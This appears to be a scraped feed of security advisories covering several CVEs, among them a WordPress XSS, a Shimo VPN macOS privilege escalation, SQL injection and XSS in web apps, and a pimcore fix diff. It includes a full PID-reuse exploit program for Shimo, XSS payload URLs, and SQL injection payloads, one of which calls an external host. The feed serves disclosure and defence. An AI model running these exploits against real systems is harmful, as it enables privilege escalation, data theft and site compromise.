Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in CoreFortress Easy Event calendar plugin <= 1.0 versions.

**Solution**

Deactivate and delete. No reply from the vendor.

Nithissh S discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Easy Event calendar Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-28169: WordPress Easy Event calendar plugin <= 1.0 - Cross Site Scripting (XSS) vulnerability - Patchstack

An issue in the helper tool of Mailbutler GmbH Shimo VPN Client for macOS v5.0.4 allows attackers to bypass authentication via PID re-use.

**Shimo 5.0.4 - Privilege Escalation**

In the Shimo VPN client in version 5.0.4 on macOS, the com.feingeist.shimo.helper tool implements an unprotected XPC service that can be abused to create scripts as root on the filesystem, what can lead to privilege escalation.

When a client connects to the service the incomming connection is verified using processIdentifier instead of audit_token. Such a mechanism is prone to PID reuse attack. During this attack it is possible to impersonate a legitimate client and use all methods offered by ShimoHelperToolProtocol protocol.

Vulnerable method of ShimoHelperTool Class. As shown below, the verification is based on PID, so it is possible to bypass client restrictions:

/\* @class ShimoHelperTool \*/
-(char)listener:(void \*)arg2 shouldAcceptNewConnection:(void \*)arg3 {
    r13 = self;
    r15 = \[arg2 retain\];
    r12 = \[arg3 retain\];
    rax = \[r13 listener\];
    rax = \[rax retain\];
    if (rax == r15) {
            \[rax release\];
            if (r12 != 0x0) {
                    var\_48 = r13;
                    var\_50 = r15;
                    var\_40 = \*\*\_kSecGuestAttributePid;
                    rdx = \[r12 processIdentifier\]; // VERIFICATION IS BASED ON PID
                    rax = \[NSNumber numberWithInt:rdx\];
                    rax = \[rax retain\];
                    r15 = rax;
                    var\_38 = rax;
                    rax = \[NSDictionary dictionaryWithObjects:rdx forKeys:&var\_40 count:0x1\];
                    r13 = \[rax retain\];
                    \[r15 release\];
                    rax = SecCodeCopyGuestWithAttributes(0x0, r13, 0x0, &var\_60);
                    if (rax != 0x0) {
                            r14 = 0x0;
                            syslog$DARWIN\_EXTSN(0x3);
                    }
                    else {
                            rax = SecRequirementCreateWithString(@"anchor apple generic and (identifier \\"com.feingeist.Shimo\\" or identifier \\"com.feingeist.Shimo-setapp\\") and certificate leaf\[subject.OU\] = UD5L677SZR", 0x0, &var\_58);
                            if (rax == 0x0) {
                                    rcx = &var\_68;
                                    rax = SecCodeCheckValidityWithErrors(var\_60, 0x0, var\_58, rcx);
                                    if (rax != 0x0) {
                                            r14 = 0x0;
                                            syslog$DARWIN\_EXTSN(0x3);
                                    }
                                    else {
                                            rax = \[NSXPCInterface interfaceWithProtocol:@protocol(ShimoHelperToolProtocol), rcx\];
                                            rax = \[rax retain\];
                                            \[r12 setExportedInterface:rax, rcx\];
                                            \[rax release\];
                                            \[r12 setExportedObject:var\_48, rcx\];
                                            \[r12 resume\];
                                            r14 = 0x1;
                                    }
                            }
                            else {
                                    r14 = 0x0;
                                    syslog$DARWIN\_EXTSN(0x3);
                            }
                    }
                    var\_30 = \*\*\_\_\_stack\_chk\_guard;
                    \[r13 release\];
                    \[r12 release\];
                    \[var\_50 release\];
                    if (\*\*\_\_\_stack\_chk\_guard == var\_30) {
                            rax = r14 & 0xff;
                    }
                    else {
                            rax = \_\_stack\_chk\_fail();
                    }
            }
            else {
                    rax = sub\_10000ea0a();
            }
    }
    else {
            rax = sub\_10000ea2d();
    }
    return rax;
}

**Exploit code**

Following expoit code was used to connect to the vulnerable helper, impresonate a legitimate client using PID reuse attack and execute a mehod writeConfig: atPath: withReply:, which allows for writing an arbitrary file at the disk. The file is created and owned by root user :

#import <Foundation/Foundation.h\>
#include <spawn.h\>
#include <signal.h\>

// gcc -framework Foundation -framework Security shimo.m -o shimo

static NSString\* XPCHelperMachServiceName = @"com.feingeist.shimo.helper";

@protocol ShimoHelperToolProtocol
- (void)setTimeMachineEnabled:(BOOL)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)runVpncScript:(NSString \*)arg1 withReason:(NSString \*)arg2 withReply:(void (^)(NSError \*))arg3;
- (void)cleanSystem:(unsigned long long)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)cleanKnownHostsForRemoteHost:(NSString \*)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)unloadKernelExtensions:(unsigned long long)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)loadKernelExtensions:(unsigned long long)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)configureRoutingWithCommand:(NSString \*)arg1 withReply:(void (^)(NSError \*, NSString \*))arg2;
- (void)terminateRacoonDaemonWithReply:(void (^)(NSError \*))arg1;
- (void)reloadRacoonConfigWithReply:(void (^)(NSError \*))arg1;
- (void)updateNameServerAddresses:(NSArray \*)arg1 searchDomains:(NSArray \*)arg2 defaultDomain:(NSString \*)arg3 forServiceIdentifier:(NSString \*)arg4 withReply:(void (^)(NSError \*))arg5;
- (void)deleteConfigAtPath:(NSString \*)arg1 withReply:(void (^)(NSError \*))arg2;
- (void)writeConfig:(NSString \*)arg1 atPath:(NSString \*)arg2 withReply:(void (^)(NSError \*))arg3;
- (void)disconnectService:(long long)arg1 fromRemoteHost:(NSString \*)arg2 withComPort:(unsigned long long)arg3 withPID:(int)arg4 withReply:(void (^)(NSError \*))arg5;
- (void)connectOpenConnectWithConfig:(NSString \*)arg1 toHost:(NSString \*)arg2 withCredentials:(NSString \*)arg3 withHash:(NSString \*)arg4 withComPort:(unsigned long long)arg5 withReply:(void (^)(NSError \*, int))arg6;
- (void)connectRacoonToHost:(NSString \*)arg1 withCredentials:(NSDictionary \*)arg2 withComPort:(unsigned long long)arg3 withReply:(void (^)(NSError \*, int))arg4;
- (void)connectSSHWithConfig:(NSString \*)arg1 toHost:(NSString \*)arg2 withCredentials:(NSString \*)arg3 withComPort:(unsigned long long)arg4 withReply:(void (^)(NSError \*, int))arg5;
- (void)connectPPPWithConfig:(NSString \*)arg1 withCredentials:(NSDictionary \*)arg2 withComPort:(unsigned long long)arg3 requiresRacoon:(BOOL)arg4 withReply:(void (^)(NSError \*, int))arg5;
- (void)connectVPNCWithConfig:(NSString \*)arg1 withComPort:(unsigned long long)arg2 withReply:(void (^)(NSError \*, int))arg3;
- (void)connectOpenVPNWithConfig:(NSString \*)arg1 withManagementPort:(unsigned long long)arg2 withReply:(void (^)(NSError \*, NSString \*))arg3;
- (void)setTmpDirPath:(NSString \*)arg1;
- (void)setShimoBundlePath:(NSString \*)arg1;
@end

int main(void) {

    #define RACE\_COUNT 10
    #define kValid "/Applications/Shimo 2.app/Contents/MacOS/Shimo" // HERE
    extern char \*\*environ;

    int pids\[RACE\_COUNT\];
    for (int i = 0; i < RACE\_COUNT; i++)
    {
        int pid = fork();
        if (pid == 0)
        {
        NSString\*  \_serviceName = XPCHelperMachServiceName;
        NSXPCConnection\* \_agentConnection = \[\[NSXPCConnection alloc\] initWithMachServiceName:\_serviceName options:4096\];
        \[\_agentConnection setRemoteObjectInterface:\[NSXPCInterface interfaceWithProtocol:@protocol(ShimoHelperToolProtocol)\]\];
        \[\_agentConnection resume\];

        id obj = \[\_agentConnection remoteObjectProxyWithErrorHandler:^(NSError\* error)
         {
             (void)error;
             NSLog(@"Connection Failure");
         }\];
        NSLog(@"obj: %@", obj);
        NSLog(@"conn: %@", \_agentConnection);
        //get FW state
        NSString\* sudo\_config = @"teststring";
        NSString\* sudo\_path = @"/Library/Scripts/poc.sh";
        
        // - (void)writeConfig:(NSString \*)arg1 atPath:(NSString \*)arg2 withReply:(void (^)(NSError \*))arg3;
        \[obj writeConfig:sudo\_config atPath:sudo\_path withReply:^(NSError \* err){
             NSLog(@"Response: %@", err);
                 }\];
 
        NSLog(@"Done");
        // start PID reuse
        char target\_binary\[\] = kValid;
        char \*target\_argv\[\] = {target\_binary, NULL};
        posix\_spawnattr\_t attr;
        posix\_spawnattr\_init(&attr);
        short flags;
        posix\_spawnattr\_getflags(&attr, &flags);
        flags |= (POSIX\_SPAWN\_SETEXEC | POSIX\_SPAWN\_START\_SUSPENDED);
        posix\_spawnattr\_setflags(&attr, flags);
        posix\_spawn(NULL, target\_binary, NULL, &attr, target\_argv, environ);
        }
        printf("forked %d\\n", pid);
        pids\[i\] = pid;
    }
    // keep the child processes alive
    sleep(10);
    
    cleanup:
    for (int i = 0; i < RACE\_COUNT; i++)
    {
        pids\[i\] && kill(pids\[i\], 9);
    }
}

**POC**

Once the exploit code is executed a file poc.sh has been created

    user@catalina1 exploit % ls -la /Library/Scripts
    total 8
    drwxr-xr-x  11 root  wheel   352 Apr  1 04:40 .
    drwxr-xr-x  66 root  wheel  2112 Aug 30  2021 ..
    drwxr-xr-x  10 root  wheel   320 Aug 24  2019 ColorSync
    drwxr-xr-x  15 root  wheel   480 Aug 24  2019 Folder Action Scripts
    drwxr-xr-x   6 root  wheel   192 Aug 24  2019 Folder Actions
    drwxr-xr-x   7 root  wheel   224 Sep  3  2019 Font Book
    drwxr-xr-x   8 root  wheel   256 Aug 24  2019 Printing Scripts
    drwxr-xr-x  14 root  wheel   448 Aug 24  2019 Script Editor Scripts
    drwxr-xr-x   7 root  wheel   224 Aug 24  2019 UI Element Scripts
    drwxr-xr-x   5 root  wheel   160 Sep 10  2019 VoiceOver
    -rw-r--r--@  1 root  wheel    10 Apr  1 04:40 poc.sh
    

**Recommendation**

Use the audit token instead of process identifier to create the SecCode references. Example Resource

CVE-2023-30328: randomideas/ShimoVPN.md at main · rand0mIdas/randomideas

Red Hat Security Advisory 2023-2097-03 - Red Hat Satellite is a systems management tool for Linux-based infrastructure. It allows for provisioning, remote management, and monitoring of multiple Linux deployments with a single centralized tool. Issues addressed include code execution, cross site scripting, denial of service, deserialization, improper neutralization, information leakage, and remote shell upload vulnerabilities.

Red Hat Security Advisory 2023-2097-03

A use of a weak cryptographic algorithm vulnerability [CWE-327] in FortiNAC 9.4.1 and below, 9.2.6 and below, 9.1.0 all versions, 8.8.0 all versions, 8.7.0 all versions may increase the chances of an attacker to have access to sensitive information or to perform man-in-the-middle attacks.

** PSIRT Advisories**

**FortiNAC - SSH Weak Key Exchange Algorithm**

**Summary**

A use of a weak cryptographic algorithm vulnerability \[CWE-327\] in FortiNAC may increase the chances of an attacker to have access to sensitive information or to perform man-in-the-middle attacks.

**Affected Products**

At least  
FortiNAC-F version 7.2.0  
FortiNAC version 9.4.0 through 9.4.1  
FortiNAC version 9.2.0 through 9.2.6  
FortiNAC version 9.1.0 through 9.1.8  
FortiNAC version 8.8.0 through 8.8.11  
FortiNAC version 8.7.0 through 8.7.6

**Solutions**

Please upgrade to FortiNAC-F version 7.2.1 or above  
Please upgrade to FortiNAC version 9.4.2 or above  
Please upgrade to FortiNAC version 9.2.7 or above

**Acknowledgement**

Fortinet is pleased to thank KPN for bringing this issue to our attention under responsible disclosure.

**Timeline**

2023-04-13: Initial publication

CVE-2022-45858: Fortiguard

An issue was discovered in bgpd in FRRouting (FRR) through 8.4. By crafting a BGP OPEN message with an option of type 0xff (Extended Length from RFC 9072), attackers may cause a denial of service (assertion failure and daemon restart, or out-of-bounds read). This is possible because of inconsistent boundary checks that do not account for reading 3 bytes (instead of 2) in this 0xff case.

CVE-2022-40302: Releases · FRRouting/frr

Emporium Multi-Vendor version 2.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : mybizcms.com                                                               ││  Vendor   : MyBizCMS                                                                   ││  Software : Emporium Multi-Vendor 2.1 - eCommerce Marketplace Platform CMS             ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchGET parameter 'q' is vulnerable to RXSShttps://website/search?q=nyqm1%22%3e%3cscript%3ealert(1)%3c%2fscript%3erw4xg&pg=8GET parameter 'pg' is vulnerable to RXSShttps://website/search?q=&pg=8ej3m8%3cscript%3ealert(1)%3c%2fscript%3ezxubp[-] Done

Emporium Multi-Vendor 2.1 Cross Site Scripting

AC Repair and Services version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: AC Repair and Services-2023-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 05.01.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-acrss.zip## Reference: https://portswigger.net/web-security/sql-injection## Description:The `id` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\ik6wj36vs4uyp5d7amwk4tdsdjjc739r0uolbcz1.namaikatiputkatatupa.com\\cbc'))+'was submitted in the id parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: id (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=services/view_service&id=1'+(selectload_file('\\\\ik6wj36vs4uyp5d7amwk4tdsdjjc739r0uolbcz1.namaikatiputkatatupa.com\\cbc'))+''AND (SELECT 6992 FROM (SELECT(SLEEP(3)))eeOg) AND 'PsSH'='PsSH---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/AC-Repair-and-Services-2023-1.0)## Proof and Exploit:[href](https://streamable.com/pfigvu)## Time spend:01:00:00

AC Repair And Services 1.0 SQL Injection

A valid, authenticated XCC user with read-only permissions can modify custom user roles on other user accounts and the user trespass message through the XCC CLI. There is no exposure if SSH is disabled or if there are no users assigned optional read-only permissions.

**About Lenovo**

*   Our Company
*   News
*   Investor Relations
*   Sustainability
*   Product Compliance
*   Product Security
*   Lenovo Open Source
*   Legal Information
*   Jobs at Lenovo

**Shop**

*   Laptops & Ultrabooks
*   Tablets
*   Desktops & All-in-Ones
*   Workstations
*   Accessories & Software
*   Servers
*   Storage
*   Networking
*   Laptop Deals
*   Outlet

**Support**

*   Drivers & Software
*   How To's
*   Warranty Lookup
*   Parts Lookup
*   Contact Us
*   Repair Status Check
*   Imaging & Security Resources

**Resources**

*   Where to Buy
*   Shopping Help
*   Track Order Status
*   Product Specifications (PSREF)
*   Forums
*   Registration
*   Product Accessibility
*   Environmental Information
*   Gaming Community
*   LenovoEDU Community
*   LenovoPRO Community

© Lenovo.  
| | | |

CVE-2023-29058: Lenovo XClarity Controller (XCC) Vulnerabilities - Lenovo Support US

Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.21.

Expand Up

@@ -346,14 +346,14 @@ public function doGetGridColumnConfig(Request $request, Config $config, $isDelet

$gridConfigId = $savedGridConfig\->getId();

$gridConfig = $savedGridConfig\->getConfig();

$gridConfig = json\_decode($gridConfig, true);

$gridConfigName = $savedGridConfig\->getName();

$gridConfigName = SecurityHelper::convertHtmlSpecialChars($savedGridConfig\->getName());

$owner = $savedGridConfig\->getOwnerId();

$ownerObject = User::getById($owner);

if ($ownerObject instanceof User) {

$owner = $ownerObject\->getName();

}

$modificationDate = $savedGridConfig\->getModificationDate();

$gridConfigDescription = $savedGridConfig\->getDescription();

$gridConfigDescription = SecurityHelper::convertHtmlSpecialChars($savedGridConfig\->getDescription());

$sharedGlobally = $savedGridConfig\->isShareGlobally();

$setAsFavourite = $savedGridConfig\->isSetAsFavourite();

  

Expand Down Expand Up

@@ -951,8 +951,8 @@ public function gridSaveColumnConfigAction(Request $request)

}

  

if ($metadata) {

$gridConfig\->setName($metadata\['gridConfigName'\]);

$gridConfig\->setDescription($metadata\['gridConfigDescription'\]);

$gridConfig\->setName(SecurityHelper::convertHtmlSpecialChars($metadata\['gridConfigName'\]));

$gridConfig\->setDescription(SecurityHelper::convertHtmlSpecialChars($metadata\['gridConfigDescription'\]));

$gridConfig\->setShareGlobally($metadata\['shareGlobally'\] && $this\->getAdminUser()->isAdmin());

$gridConfig\->setSetAsFavourite($metadata\['setAsFavourite'\] && $this\->getAdminUser()->isAdmin());

}

Expand All

@@ -968,8 +968,8 @@ public function gridSaveColumnConfigAction(Request $request)

  

$settings = $this\->getShareSettings($gridConfig\->getId());

$settings\['gridConfigId'\] = (int)$gridConfig\->getId();

$settings\['gridConfigName'\] = $gridConfig\->getName();

$settings\['gridConfigDescription'\] = $gridConfig\->getDescription();

$settings\['gridConfigName'\] = SecurityHelper::convertHtmlSpecialChars($gridConfig\->getName());

$settings\['gridConfigDescription'\] = SecurityHelper::convertHtmlSpecialChars($gridConfig\->getDescription());

$settings\['shareGlobally'\] = $gridConfig\->isShareGlobally();

$settings\['setAsFavourite'\] = $gridConfig\->isSetAsFavourite();

$settings\['isShared'\] = $gridConfig\->getOwnerId() != $this\->getAdminUser()->getId() && !$this\->getAdminUser()->isAdmin();

Expand Down

CVE-2023-2340: [Security] Stored cross site scripting vulnerability in Save grid opt… · pimcore/pimcore@aa38319

This vulnerability exists in GajShield Data Security Firewall firmware versions prior to v4.28 (except v4.21) due to insecure default credentials which allows remote attacker to login as superuser by using default username/password via web-based management interface and/or exposed SSH port thereby enabling remote attackers to execute arbitrary commands with administrative/superuser privileges on the targeted systems.

The vulnerability has been addressed by forcing the user to change their default password to a new non-default password.


Tag

#ssh